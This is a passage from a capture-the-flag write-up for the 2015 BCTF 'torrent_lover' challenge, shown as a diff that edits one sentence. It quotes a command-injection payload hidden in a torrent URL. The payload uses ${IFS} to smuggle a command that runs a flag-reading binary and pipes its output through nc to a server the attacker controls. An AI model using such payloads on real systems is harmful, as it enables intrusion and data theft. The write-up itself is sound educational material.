d4rwinb0ts/ctf-writeups/2015-bctf/torrent_lover.md

 http://<myserver>;/var/www/flag/use_me_to_read_flag${IFS}/var/www/flag/flag|nc${IFS}<myserver>${IFS}9999;.torrent
 ```
 I see a message that says: `You do not have permission to access /var/www/flag/flag` Using ls -al to inspect the permissions, it appears that
-the binary does have permissions to read the flag.
+the binary does have the proper permissions to read the flag.
 We probably want to grab the binary and inspect it locally.

 ### A small bit of reverse engineering
 Command to grab the binary: